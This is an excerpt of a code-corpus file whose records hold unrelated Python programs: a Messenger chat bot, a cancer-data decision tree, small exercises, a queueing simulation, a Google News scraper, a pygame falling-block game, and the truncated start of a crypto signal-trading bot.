pagod.\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif 50 < rand < 75:\r\n client.send(Message(\r\n text=\"Dumbbell ka talaga, pero kapag tinatamad ka lang.\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif 75 < rand < 80:\r\n client.send(Message(\r\n text=\"Dumbbell ka, pero nakakabawi pa rin.\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif 80 < rand < 100:\r\n client.send(Message(\r\n text=\"It's your lucky day! 
Hindi ka dumbbell!\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n\r\n elif msgText == \"ano commands\" or \"ano commands nung bot\" in msgText:\r\n client.send(Message(\r\n text=\"COMMANDS:\\n\"\r\n \"weather: just say 'tell me the weather today.'\\n\"\r\n \"\"\r\n \"\"\r\n \"dumbbell-o-meter: just say 'dumbbell ba ako?'\\n\"\r\n \"More explanation of the features @ : https://pastebin.com/6yUEA0sR\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n\r\n\r\n\r\n def sendMsgg():\r\n if author_id != self.uid:\r\n self.send(Message(text=\"Hello!\"), thread_id=thread_id, thread_type=thread_type)\r\n self.markAsDelivered(author_id, thread_id)\r\n\r\n if \"online\" in pText:\r\n sendMsgg()\r\n\r\n\r\n# ####################################################################\r\n# Assigning values\r\n\r\n\r\nset_interval(check, 18000)\r\nclient1 = punkjj(\"email\", \"pass\")\r\nclient1.listen()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"48777673","text":"import pandas as pd\n\n# carregamento da base\ndata_cancer = pd.read_csv('dataset/cancer_data.csv')\n\n# pré processamento da base\nX = data_cancer.drop(columns=['Unnamed: 32', 'id', 'diagnosis']) \ny = data_cancer['diagnosis'].values\n\nfrom sklearn.preprocessing import LabelEncoder\n\ny_converted = y\n\nl_enc = LabelEncoder()\ny_converted = l_enc.fit_transform(y_converted)\n\nfrom sklearn.model_selection import train_test_split\n\n# divide a classe em teste 20% e treino 80%\nX_train, X_test, y_train, y_test = train_test_split(X, y_converted, test_size=0.2, random_state=1, stratify=y)\n\n# árvore de decisão\nfrom sklearn import tree\nclf = tree.DecisionTreeClassifier(criterion='entropy', splitter='random')\n\n# treina o modelo\nclf = clf.fit(X_train, y_train)\n\n# salva os resultados da classificação dos testes\ny_pred = clf.predict(X_test) \n\n# acurácia\nfrom sklearn.metrics import accuracy_score\nprint('Acurácia: ', round(accuracy_score(y_test,y_pred),2)) \n\n# matriz de confusao\nfrom sklearn.metrics import confusion_matrix\nprint('Matriz de confusão: \\n', confusion_matrix(y_test, y_pred))\n\n# sensibilidade\ntp, fp, fn, tn = confusion_matrix(y_test, y_pred).ravel()\nsensibility = tn / (tn+fn)\nprint('Sensibilidade: ', round(sensibility,2))\n\n# especificidade\nspecificity = tn / (tn+fp)\nprint('Especificidade: ', round(specificity, 2))","sub_path":"tree_cancer.py","file_name":"tree_cancer.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"285872385","text":"# http://www.checkio.org\n# Common Words\n# Mar 17, 2016\n# Robert Monahan\n\ndef words_in_common(a, b):\n\ta = a.split(',')\n\tb = b.split(',')\n\n\tcommon = []\n\tfor word_a in a:\n\t\tfor word_b in b:\n\t\t\tif word_a == word_b:\n\t\t\t\tcommon.append(word_a)\n\n\treturn ','.join(sorted(common))\n\n\nwords_in_common(\"hello,world\", \"hello,earth\")\t# \"hello\"\nwords_in_common(\"one,two,three\", \"four,five,six\")\t# \"\"\nwords_in_common(\"one,two,three\", \"four,five,one,two,six,three\")\t# \"one,three,two\"\n\n \n\n","sub_path":"elementary/common_words.py","file_name":"common_words.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"264848165","text":"import math\nimport random\nimport numpy\nimport math\nfrom scipy import 
stats\nimport sys\n# global parameter\n\n\n'''\nclient's request's arrival time\nexponential distribution with 0.85 request rate\n+ uniform distribution random number \n'''\n\n\ndef next_arrival_time(rateParameter):\n return (-math.log(1.0 - random.random()) / rateParameter) + random.uniform(\n 0.05, 0.25)\n\n\ndef pp_service_time(selected_number):\n return -math.log(1.0 - random.random()) / ( NUMBER_OF_SERVERS/\n selected_number\n )\n\n\nclass server_service(stats.rv_continuous):\n\n def _pdf(self, x):\n\n return (1 / (NUMBER_OF_SELECTED**\n (1.65 * 2.08))) * (2.08 * (10.3846**2.08) / (x**3.08))\n\n\ndef mean_response_time(n):\n NUMBER_OF_SELECTED = n\n request = []\n pp = []\n server_time = []\n server_index = []\n ss = server_service(a=10.3846 / (NUMBER_OF_SELECTED**1.65),\n b=math.inf,\n name='my_pdf')\n pre_arrival = 0\n for i in range(NUMBER_OF_REQUEST):\n tmp = next_arrival_time(REQUEST_RATE)\n request.append(pre_arrival + tmp)\n pre_arrival += tmp\n tmp = pp_service_time(NUMBER_OF_SELECTED)\n pp.append(tmp)\n server_time.append([])\n for k in range(NUMBER_OF_SERVERS):\n server_time[i].append(0)\n server_index.append([])\n for j in range(NUMBER_OF_SELECTED):\n tmp = ss.rvs()\n while (True):\n s_tmp = random.randint(1, NUMBER_OF_SERVERS) - 1\n if s_tmp not in server_index[i]:\n break\n server_time[i][s_tmp] = tmp\n server_index[i].append(s_tmp)\n\n pp_finished = []\n server_finised = []\n response_time = []\n for i in range(NUMBER_OF_REQUEST):\n pp_finished.append([])\n server_finised.append([])\n for k in range(NUMBER_OF_SERVERS):\n server_finised[i].append(0)\n\n '''\n calculate finish time of each preprocessor\n based on request time and preprocessor's service time\n '''\n\n if i == 0:\n pp_finished[i] = request[i] + pp[i]\n max = 0\n for j in server_index[i]:\n server_finised[i][j] = pp_finished[i] + server_time[i][j]\n if server_finised[i][j] > max:\n max = server_finised[i][j]\n response_time.append(max - request[i])\n continue\n\n if request[i] < pp_finished[i-1]:\n pp_finished[i] = pp_finished[i-1] + pp[i]\n else:\n pp_finished[i] = request[i] + pp[i]\n\n max = 0\n for j in server_index[i]:\n if pp_finished[i] > server_finised[i-1][j]:\n server_finised[i][j] = pp_finished[i] + server_time[i][j]\n else:\n server_finised[i][j] = server_finised[i-1][j] + server_time[i][j]\n if server_finised[i][j] > max:\n max = server_finised[i][j]\n response_time.append(max - request[i])\n\n return sum(each_res for each_res in response_time) / NUMBER_OF_REQUEST\n\n\nif __name__ == '__main__':\n\n NUMBER_OF_SERVERS = 10\n selected_list = range(1, 11)\n\n\n SEED = 1000\n random.seed(SEED)\n numpy.random.seed(SEED)\n REQUEST_RATE = 0.85\n\n with open(\"result.txt\", 'w') as file:\n for each_select in selected_list:\n mean_resp = []\n NUMBER_OF_SELECTED = each_select\n\n print('selected server' 'number is ' + str(NUMBER_OF_SELECTED))\n file.write('selected server number is ' + str(NUMBER_OF_SELECTED)+'\\n')\n print('number_of_request mean_response_time')\n file.write('number_of_request mean_response_time\\n')\n request_list = [500, 1000, 1500, 2000, 2500]\n for i in request_list:\n NUMBER_OF_REQUEST = i\n # mean_response_time(i)\n tmp = mean_response_time(NUMBER_OF_SELECTED)\n mean_resp.append(tmp)\n file.write('{:17s} {:18s}\\n'.format(str(NUMBER_OF_REQUEST), str(tmp)))\n print('{:17s} {:18s}\\n'.format(str(NUMBER_OF_REQUEST), str(tmp)))\n\n file.write('mean value for five replications: ' + str(numpy.average(mean_resp)) + '\\n')\n file.write('standard deviation for five replications: ' + 
str(numpy.std(mean_resp)) + '\\n\\n\\n')\n print('mean value for five replications: ', numpy.average(mean_resp))\n print('standard deviation for five replications: ', numpy.std(mean_resp))\n\n\n","sub_path":"2016s1/cs9334/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"214946853","text":"from __future__ import print_function\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef forge_url(q, start):\n return 'https://www.google.co.jp/search?q={}&hl=en&tbm=nws&start={}'.format(q.replace(' ', '+'), start)\n\n\ndef index(str1, pattern):\n \"\"\" because '&'.index(str) did not work for HTML strings!\"\"\"\n N = len(pattern)\n for i in range(0, len(str1) - N):\n if str1[i:i + N] == pattern:\n return i\n return -1\n\n\n# extract timestamp : \ndef extract_links(content):\n soup = BeautifulSoup(content, 'html.parser')\n links = [v.contents[0].attrs['href'][7:] for v in soup.find_all('h3', {\"class\": \"r\"})]\n links = [link[0:index(link, '&')] for link in links]\n dates = [v.string.split('-')[1] for v in soup.find_all('span', {\"class\": \"f\"}) if '-' in v.string]\n return links, dates\n\n\ndef run(q, limit=10):\n num_articles_index = 0\n while num_articles_index < limit:\n url = forge_url(q, num_articles_index)\n print('For Google -> {}'.format(url))\n response = requests.get(url)\n links, dates = extract_links(response.content)\n for i in range(len(links)):\n print('{} - {}'.format(links[i], dates[i]))\n num_articles_index += 10\n\n\nrun(q='Honda Factory', limit=40)\n","sub_path":"requests_test_2.py","file_name":"requests_test_2.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"560545754","text":"class Solution:\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n for row in board:\n nums = [x for x in row if x != '.' ]\n if self.notValid(nums):\n return False\n \n for i in range(len(board[0])):\n col = [row[i] for row in board]\n nums = [x for x in col if x != '.' 
]\n if self.notValid(nums):\n return False\n \n for i in [0, 3, 6]:\n for j in [0, 3, 6]:\n nums = [x for row in board[i:i+3] for x in row[j:j+3] if x != '.']\n if self.notValid(nums):\n return False\n return True\n \n def notValid(self, nums):\n return len(set(nums)) != len(nums)\n","sub_path":"36-Valid-Sudoku/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"162157447","text":"import pygame\nfrom pygame.locals import *\nfrom random import randint\n\npygame.init()\nSCREEN_SIZE = (640, 480)\nmain_screen = pygame.display.set_mode(SCREEN_SIZE, 0, 32)\n# key down\nROTATE_LEFT, ROTATE_RIGHT, TO_BOTTOM = range(3)\n# diamond size\nDIAMOND_SIZE = (20, 20)\n# color type\ndiamond_color_size = 6\nCOLOR_RED, COLOR_BLUE, COLOR_GREEN, COLOR_YELLOW, COLOR_BLACK, COLOR_NO_DIAMOND = range(\n diamond_color_size)\nCOLOR = {\n COLOR_RED: (255, 0, 0),\n COLOR_BLUE: (0, 0, 255),\n COLOR_GREEN: (0, 255, 0),\n COLOR_YELLOW: (255, 255, 0),\n COLOR_BLACK: (0, 0, 0),\n COLOR_NO_DIAMOND: (100, 100, 100),\n}\n\nCOLOR_DIAMOND = {\n COLOR_RED: pygame.surface.Surface(DIAMOND_SIZE).convert(),\n COLOR_BLUE: pygame.surface.Surface(DIAMOND_SIZE).convert(),\n COLOR_GREEN: pygame.surface.Surface(DIAMOND_SIZE).convert(),\n COLOR_YELLOW: pygame.surface.Surface(DIAMOND_SIZE).convert(),\n COLOR_BLACK: pygame.surface.Surface(DIAMOND_SIZE).convert(),\n COLOR_NO_DIAMOND: pygame.surface.Surface(DIAMOND_SIZE).convert(),\n}\n\n\n#\ndef draw_rect(lw, surface, rgb_color):\n rect = (lw, lw, DIAMOND_SIZE[0] - 2 * lw, DIAMOND_SIZE[1] - 2 * lw)\n pygame.draw.line(surface, rgb_color, (rect[0], rect[1]), (rect[0], rect[3]), lw)\n pygame.draw.line(surface, rgb_color, (rect[0], rect[1]), (rect[2], rect[1]), lw)\n pygame.draw.line(surface, rgb_color, (rect[0], rect[3]), (rect[2], rect[3]), lw)\n pygame.draw.line(surface, rgb_color, (rect[2], rect[1]), (rect[2], rect[3]), lw)\n return\n\n\nfor x in xrange(diamond_color_size):\n COLOR_DIAMOND[x].fill(COLOR[x])\n draw_rect(2, COLOR_DIAMOND[x], (128, 128, 128))\n\n# begin time\nclock = pygame.time.Clock()\n# GAME SCREEN SIZE\nGAME_SCREEN_SIZE = (10, 20)\nGAME_SCREEN_MID = GAME_SCREEN_SIZE[0] / 2\n# font\nuse_font = pygame.font.Font(\"FONT.TTF\", 16)\n# POINT\nSCORE_POINT = (250, 100)\nNEXT_DIAMOND_POINT = (12, 5)\nMOVING_DIAMOND_OUT_POINT = (GAME_SCREEN_MID, 0)\nSCREEN_MID_POINT = (GAME_SCREEN_SIZE[0]*DIAMOND_SIZE[0]/2, GAME_SCREEN_SIZE[1]*DIAMOND_SIZE[1]/2)\n\n\nclass World(object):\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.game_surface = use_font.render(\"game over. 
enter any key to restart.\", True\n , COLOR[COLOR_RED], COLOR[COLOR_BLUE])\n\n self.width = width\n self.height = height\n self.background = pygame.surface.Surface(\n (self.width * DIAMOND_SIZE[0] + 1, self.height * DIAMOND_SIZE[1] + 1)).convert()\n self.background.fill((200, 255, 200))\n self.no_diamond = COLOR_DIAMOND[COLOR_NO_DIAMOND]\n\n self.diamonds = {}\n self.diamond_id = 0\n self.init_diamonds()\n self.moving_diamond = self.create_diamond()\n self.moving_diamond.move_x(GAME_SCREEN_SIZE[0] / 2)\n self.next_diamond = self.create_diamond()\n self.next_diamond.move_x(NEXT_DIAMOND_POINT[0])\n self.game_over = False\n self.d_time = 0.\n self.score = 0\n self.score_surface = use_font.render(\"score: 0\", True, COLOR[COLOR_BLACK], COLOR[COLOR_BLUE])\n return\n\n def init_value(self):\n self.diamonds = {}\n self.diamond_id = 0\n self.init_diamonds()\n self.moving_diamond = self.create_diamond()\n self.moving_diamond.move_x(GAME_SCREEN_SIZE[0] / 2)\n self.next_diamond = self.create_diamond()\n self.next_diamond.move_x(NEXT_DIAMOND_POINT[0])\n self.d_time = 0.\n self.score = 0\n self.score_surface = use_font.render(\"score: 0\", True, COLOR[COLOR_BLACK], COLOR[COLOR_BLUE])\n self.game_over = False\n return\n\n def init_diamonds(self):\n for x in xrange(0, self.width):\n for y in xrange(0, self.height):\n self.diamonds[x, y] = None\n return\n\n def create_diamond(self):\n return Diamond(self)\n\n def process(self, process_time):\n if self.game_over:\n return\n self.d_time += process_time\n if self.d_time > 500.:\n self.d_time -= 500.\n if self.moving_diamond is None:\n self.moving_diamond = self.next_diamond\n self.moving_diamond.move_x(-NEXT_DIAMOND_POINT[0] + GAME_SCREEN_SIZE[0] / 2)\n self.next_diamond = self.create_diamond()\n self.next_diamond.move_x(NEXT_DIAMOND_POINT[0])\n return\n self.diamond_down()\n return\n\n def add_diamond_world(self, diamond):\n nodes = diamond.get_all_node()\n for k in nodes.keys():\n if nodes[k] is not None:\n self.diamonds[nodes[k].get_pos()] = nodes[k]\n self.moving_diamond = None\n self.erase()\n self.check_game()\n return\n\n def check_game(self):\n for x in xrange(0, self.width):\n if self.diamonds[x, 1] is not None:\n self.game_over = True\n return False\n return True\n\n def render_background(self, surface):\n surface.blit(self.background, (self.x, self.y))\n for x in xrange(self.width):\n for y in xrange(self.height):\n surface.blit(self.no_diamond, (self.x + x * DIAMOND_SIZE[0], self.y + y * DIAMOND_SIZE[1]))\n return\n\n def render(self, surface):\n self.render_background(surface)\n\n for diamond in self.diamonds.itervalues():\n if diamond is not None:\n diamond.render(surface)\n\n if self.moving_diamond:\n self.moving_diamond.render(surface)\n self.next_diamond.render(surface)\n\n surface.blit(self.score_surface, SCORE_POINT)\n if self.game_over:\n surface.blit(self.game_surface\n , (SCREEN_MID_POINT[0]-self.game_surface.get_width()/2+self.x\n , SCREEN_MID_POINT[1]-self.game_surface.get_height()/2+self.y))\n return\n\n def event_key_down(self, key):\n if self.game_over:\n self.init_value()\n return\n if K_LEFT == key:\n self.diamond_left()\n elif K_RIGHT == key:\n self.diamond_right()\n elif K_DOWN == key:\n self.diamond_down()\n elif K_UP == key:\n self.moving_diamond_rotate()\n return\n\n def moving_diamond_bottom(self):\n if self.moving_diamond is None:\n return\n self.moving_diamond.get_bottom()\n return\n\n def moving_diamond_rotate(self):\n if self.moving_diamond is None:\n return\n index = self.moving_diamond.get_next_rotate()\n for v in 
index.itervalues():\n if v[0] < 0 or v[0] >= self.width or v[1] >= self.height or self.diamonds[v] is not None:\n return\n self.moving_diamond.rotate()\n return\n\n def diamond_down(self):\n if self.moving_diamond is None:\n return\n bottom = self.moving_diamond.get_bottom()\n for i in bottom:\n next_pos = (bottom[i][0], bottom[i][1] + 1)\n if next_pos[1] >= self.height:\n self.add_diamond_world(self.moving_diamond)\n return\n if self.diamonds[next_pos] is not None:\n self.add_diamond_world(self.moving_diamond)\n return\n self.moving_diamond.move_y(1)\n return\n\n def diamond_left(self):\n if self.moving_diamond is None:\n return\n left = self.moving_diamond.get_left()\n for i in left:\n next_pos = (left[i][0] - 1, left[i][1])\n if next_pos[0] < 0 or self.diamonds[next_pos] is not None or self.width < next_pos[0]:\n return\n\n self.moving_diamond.move_x(-1)\n return\n\n def diamond_right(self):\n if self.moving_diamond is None:\n return\n left = self.moving_diamond.get_right()\n for i in left:\n next_pos = (left[i][0] + 1, left[i][1])\n if self.width <= next_pos[0] or self.diamonds[next_pos] is not None or next_pos[0] < 0:\n return\n self.moving_diamond.move_x(1)\n return\n\n def point_to_index(self, point):\n return (point[0] - self.x) / DIAMOND_SIZE[0], (point[1] - self.y) / DIAMOND_SIZE[1]\n\n def index_to_point(self, index):\n return index[0] * DIAMOND_SIZE[0] + self.x, index[1] * DIAMOND_SIZE[1] + self.y\n\n def erase(self):\n n = 0\n for line in xrange(0, self.height):\n if self.is_full(line):\n self.clear_line(line)\n n += 1\n self.drop_more_than_line(line)\n line -= 1\n self.score += n * n\n str = \"score: %d\" % self.score\n self.score_surface = use_font.render(str, True, COLOR[COLOR_BLACK], COLOR[COLOR_BLUE])\n return\n\n def drop_more_than_line(self, line):\n for y in xrange(0, line):\n for x in xrange(0, self.width):\n yy = line - y\n if self.diamonds[x, yy] is not None:\n self.diamonds[x, yy].move_y(1)\n self.diamonds[x, yy + 1] = self.diamonds[x, yy]\n self.diamonds[x, yy] = None\n return\n\n def is_full(self, y):\n for x in xrange(0, self.width):\n if self.diamonds[x, y] is None:\n return False\n return True\n\n def clear_line(self, y):\n for x in xrange(0, self.width):\n self.diamonds[x, y] = None\n return\n\n\nclass Node(object):\n def __init__(self, x, y, background, world):\n self.x = x\n self.y = y\n self.background = background\n self.world = world\n return\n\n def render(self, surface):\n surface.blit(self.background, (self.world.index_to_point((self.x, self.y))))\n return\n\n def move_x(self, x):\n self.x += x\n return\n\n def move_y(self, y):\n self.y += y\n return\n\n def get_pos(self):\n return self.x, self.y\n\n def get_x(self):\n return self.x\n\n def get_y(self):\n return self.y\n\n def set_pos(self, index):\n self.x = index[0]\n self.y = index[1]\n return\n\n\ndiamond_point_type_size = 7\ndiamond_point = {\n 0: {0: (0, 0), 1: (1, 0), 2: (0, 1), 3: (1, 1)},\n 1: {0: (0, 0), 1: (1, 0), 2: (2, 0), 3: (0, 1)},\n 2: {0: (0, 0), 1: (1, 0), 2: (2, 0), 3: (1, 1)},\n 3: {0: (0, 0), 1: (0, 1), 2: (0, 2), 3: (0, 3)},\n 4: {0: (0, 0), 1: (1, 0), 2: (2, 0), 3: (2, 1)},\n 5: {0: (0, 0), 1: (1, 0), 2: (1, 1), 3: (2, 1)},\n 6: {0: (1, 0), 1: (2, 0), 2: (0, 1), 3: (1, 1)},\n}\n\ndiamond_rotate_point = {\n 0: {0: {0: (0, 0), 1: (1, 0), 2: (0, 1), 3: (1, 1)}, #\n 1: {0: (0, 0), 1: (1, 0), 2: (0, 1), 3: (1, 1)},\n 2: {0: (0, 0), 1: (1, 0), 2: (0, 1), 3: (1, 1)},\n 3: {0: (0, 0), 1: (1, 0), 2: (0, 1), 3: (1, 1)},\n },\n 1: {0: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (0, 2)}, # L\n 1: 
{0: (0, 0), 1: (1, 0), 2: (1, 1), 3: (1, 2)},\n 2: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (2, 0)},\n 3: {0: (1, 0), 1: (1, 1), 2: (1, 2), 3: (2, 2)},\n },\n 2: {0: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (1, 0)}, # T\n 1: {0: (1, 0), 1: (1, 1), 2: (1, 2), 3: (2, 1)},\n 2: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (1, 2)},\n 3: {0: (1, 0), 1: (1, 1), 2: (1, 2), 3: (0, 1)},\n },\n 3: {0: {0: (1, 0), 1: (1, 1), 2: (1, 2), 3: (1, 3)}, # |\n 1: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (3, 1)},\n 2: {0: (1, 0), 1: (1, 1), 2: (1, 2), 3: (1, 3)},\n 3: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (3, 1)},\n },\n 4: {0: {0: (1, 0), 1: (1, 1), 2: (1, 2), 3: (2, 0)}, # !L\n 1: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (2, 2)},\n 2: {0: (1, 0), 1: (1, 1), 2: (1, 2), 3: (0, 2)},\n 3: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (0, 0)},\n },\n 5: {0: {0: (0, 0), 1: (1, 0), 2: (1, 1), 3: (2, 1)}, # Z\n 1: {0: (1, 0), 1: (1, 1), 2: (0, 1), 3: (0, 2)},\n 2: {0: (0, 0), 1: (1, 0), 2: (1, 1), 3: (2, 1)},\n 3: {0: (1, 0), 1: (1, 1), 2: (0, 1), 3: (0, 2)},\n },\n 6: {0: {0: (0, 1), 1: (1, 1), 2: (1, 0), 3: (2, 0)}, # !Z\n 1: {0: (0, 0), 1: (0, 1), 2: (1, 1), 3: (1, 2)},\n 2: {0: (0, 1), 1: (1, 1), 2: (1, 0), 3: (2, 0)},\n 3: {0: (0, 0), 1: (0, 1), 2: (1, 1), 3: (1, 2)},\n },\n}\n\n\nclass Diamond(object):\n def __init__(self, world):\n self.x = 0\n self.y = 0\n self.diamonds = {}\n self.diamonds_list = {}\n self.diamond_id = 0\n self.init_diamonds()\n self.world = world\n self.type = None\n self.create(world)\n self.rotate_time = 0\n return\n\n def init_diamonds(self):\n for x in xrange(0, 4):\n for y in xrange(0, 4):\n self.diamonds[x, y] = None\n return\n\n def create(self, world):\n self.type = randint(0, diamond_point_type_size - 1)\n rand_color = randint(0, 3)\n index = diamond_rotate_point[self.type][0]\n self.diamonds_list[0] = self.diamonds[index[0][0], index[0][1]] = Node(index[0][0], index[0][1],\n COLOR_DIAMOND[rand_color], world)\n self.diamonds_list[1] = self.diamonds[index[1][0], index[1][1]] = Node(index[1][0], index[1][1],\n COLOR_DIAMOND[rand_color], world)\n self.diamonds_list[2] = self.diamonds[index[2][0], index[2][1]] = Node(index[2][0], index[2][1],\n COLOR_DIAMOND[rand_color], world)\n self.diamonds_list[3] = self.diamonds[index[3][0], index[3][1]] = Node(index[3][0], index[3][1],\n COLOR_DIAMOND[rand_color], world)\n self.diamond_id = 4\n return\n\n def turn(self):\n if self.type == 0:\n return\n return\n\n def render(self, surface):\n for diamond in self.diamonds.itervalues():\n if diamond is not None:\n diamond.render(surface)\n return\n\n def move_x(self, x):\n for diamond in self.diamonds.itervalues():\n if diamond is not None:\n diamond.move_x(x)\n self.x += x\n return\n\n def move_to(self, pos):\n x = self.x - pos[0]\n y = self.y - pos[1]\n for diamond in self.diamonds.itervalues():\n if diamond is not None:\n diamond.move_x(x)\n diamond.move_x(x)\n return\n\n def move_y(self, y):\n for diamond in self.diamonds.itervalues():\n if diamond is not None:\n diamond.move_y(y)\n self.y += y\n return\n\n def get_left(self):\n left = {}\n for y in xrange(0, 4):\n for x in xrange(0, 4):\n if self.diamonds[3 - x, y] is not None:\n left[y] = self.diamonds[3 - x, y].get_pos()\n return left\n\n def get_right(self):\n right = {}\n for y in xrange(0, 4):\n for x in xrange(0, 4):\n if self.diamonds[x, y] is not None:\n right[y] = self.diamonds[x, y].get_pos()\n return right\n\n def get_bottom(self):\n bottom = {}\n for x in xrange(0, 4):\n for y in xrange(0, 4):\n if self.diamonds[x, y] is not None:\n bottom[x] = self.diamonds[x, 
y].get_pos()\n return bottom\n\n def get_all_node(self):\n return self.diamonds\n\n def get_next_rotate(self):\n c_index = diamond_rotate_point[self.type][(self.rotate_time + 1) % 4].copy()\n for k in c_index.keys():\n c_index[k] = (self.x + c_index[k][0], self.y + c_index[k][1])\n return c_index\n\n def rotate(self):\n self.rotate_time = (self.rotate_time + 1) % 4\n n = 0\n for x in xrange(0, 4):\n for y in xrange(0, 4):\n self.diamonds[x, y] = None\n for i in xrange(0, 4):\n new_pos = diamond_rotate_point[self.type][self.rotate_time][i]\n new_pos_now = (new_pos[0] + self.x, new_pos[1] + self.y)\n self.diamonds_list[i].set_pos(new_pos_now)\n self.diamonds[new_pos] = self.diamonds_list[i]\n return\n\n\nclass App(object):\n def __init__(self):\n self.screen = main_screen\n # background init\n self.background = pygame.surface.Surface(SCREEN_SIZE).convert()\n self.background.fill((255, 255, 255))\n # World init\n self.world = World(10, 10, GAME_SCREEN_SIZE[0], GAME_SCREEN_SIZE[1])\n self.create_world()\n return\n\n def create_world(self):\n self.world = World(10, 10, GAME_SCREEN_SIZE[0], GAME_SCREEN_SIZE[1])\n return\n\n def run(self):\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n return\n if event.type == KEYDOWN:\n if event.key == K_UP:\n self.world.event_key_down(event.key)\n\n pressed_keys = pygame.key.get_pressed()\n if pressed_keys[K_LEFT]:\n self.world.event_key_down(K_LEFT)\n if pressed_keys[K_RIGHT]:\n self.world.event_key_down(K_RIGHT)\n if pressed_keys[K_DOWN]:\n self.world.event_key_down(K_DOWN)\n\n self.render()\n time_passed = clock.tick(30)\n self.world.process(time_passed)\n self.world.render(self.screen)\n\n pygame.display.update()\n return\n\n def render(self):\n self.screen.blit(self.background, (0, 0))\n return\n\n\nif __name__ == \"__main__\":\n app = App()\n app.run()\n","sub_path":"game/diamond/diamond.py","file_name":"diamond.py","file_ext":"py","file_size_in_byte":17714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"110106071","text":"#Торговля по сигналам\nfrom func.main import *\n\nimport json\nwith open('data/set.txt', 'r', encoding='utf-8') as file:\n\ts = json.loads(file.read())['replacements']\n\tquant = s['volume']\n\ntrades = db['trade']\ntable = db['history']\n\ndef trade():\n#Первоначальные значения\n\ttry:\n\t\tnum = trades.find().sort('id', -1)[0]['id']\n\texcept:\n\t\tnum = 0\n\n\twhile True:\n\t\tx = [i for i in trades.find({'id': {'$gte': num+1}})]\n\n\t\tif len(x):\n\t\t\tnum = x[-1]['id']\n\n\t\tfor i in x:\n#Рассчёт основных параметров для биржи\n\t\t\tprice = i['realprice'] #чтобы не заморачиваться и каждый раз быстро вводить покупку\n\t\t\tif not price: continue #валюты нет\n\t\t\t#сделать проверку на объём валюты\n\n\t\t\tdelta = max(stock[i['exchanger']].info() * i['volume'], quant)\n\t\t\tdelta = min(delta, stock[i['exchanger']].min) #?время if delta < stock[i['exchanger']].min\n\t\t\tcount = delta / price\n\n\t\t\t#сделать проверку достаточно ли средств\n\n\t\t\ttime = strftime('%d.%m.%Y %H:%M:%S')\n\t\t\trub = stock[i['exchanger']].ru()\n\n#Покупка\n\t\t\tsucc = stock[i['exchanger']].trade(i['currency'], count, price, 2)\n\n\t\t\tsend('-' * 20)\n\t\t\tsend(i['mess'], forward=i['chat'])\n\n\t\t\tformated = 'Купить %s!\\n-----\\nК %.8f\\nɃ %.8f (%d₽)\\n∑ %.8f (%d₽)' % (currencies[i['currency']][1], count, price, price / rub, price * count, (price * count) / rub)\n\t\t\tsend(formated)\n\n\t\t\tif succ:\n\t\t\t\tsett = {'message': i['id'], 'success': 0, 'order': 
succ, 'type': 'buy', 'currency': i['currency'], 'exchanger': i['exchanger'], 'price': price, 'count': count, 'time': time, 'term': i['term']}\n\t\t\t\tprint(sett)\n\t\t\t\ttable.insert(sett)\n\n#Продажа\n\t\t\t\ttry:\n\t\t\t\t\tsu = 0\n\t\t\t\t\tx = []\n\t\t\t\t\tfor j in range(1, len(i['out']) + 1):\n\t\t\t\t\t\t#Если слишком маленький объём продажи\n\t\t\t\t\t\t#может ли быть такое, что все кроме первого объединятся, а первый будет слишком маленький\n\t\t\t\t\t\tpric = i['out'][-j][2] if i['out'][-j][1] else price * i['out'][-j][2]\n\t\t\t\t\t\tcoun = count * i['out'][-j][0]\n\t\t\t\t\t\tprint('!!!COUN!!!', coun * pric)\n\t\t\t\t\t\tif coun * pric < stock[i['exchanger']].min: #quant:\n\t\t\t\t\t\t\ti['out'][-1-j][0] += i['out'][-j][0]\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tsu += coun * pric\n\n\t\t\t\t\t\tx.append({'message': i['id'], 'success': 0, 'order': 0, 'type': 'sell', 'currency': i['currency'], 'exchanger': i['exchanger'], 'price': pric, 'count': coun, 'time': time, 'processed': 0, 'term': i['term']})\n\n\t\t\t\t\tfor j in range(len(x)-1):\n\t\t\t\t\t\tx[j]['loss'] = 0\n\t\t\t\t\tx[len(x)-1]['loss'] = i['loss'][1] if i['loss'][0] else i['loss'][1] * price\n\n\t\t\t\texcept:\n\t\t\t\t\tpric = i['out'][0][2] if i['out'][0][1] else price * i['out'][0][2]\n\t\t\t\t\tsu = count * pric\n\t\t\t\t\tlost = i['loss'][1] if i['loss'][0] else i['loss'][1] * price\n\t\t\t\t\tx = {'message': i['id'], 'success': 0, 'order': 0, 'type': 'sell', 'currency': 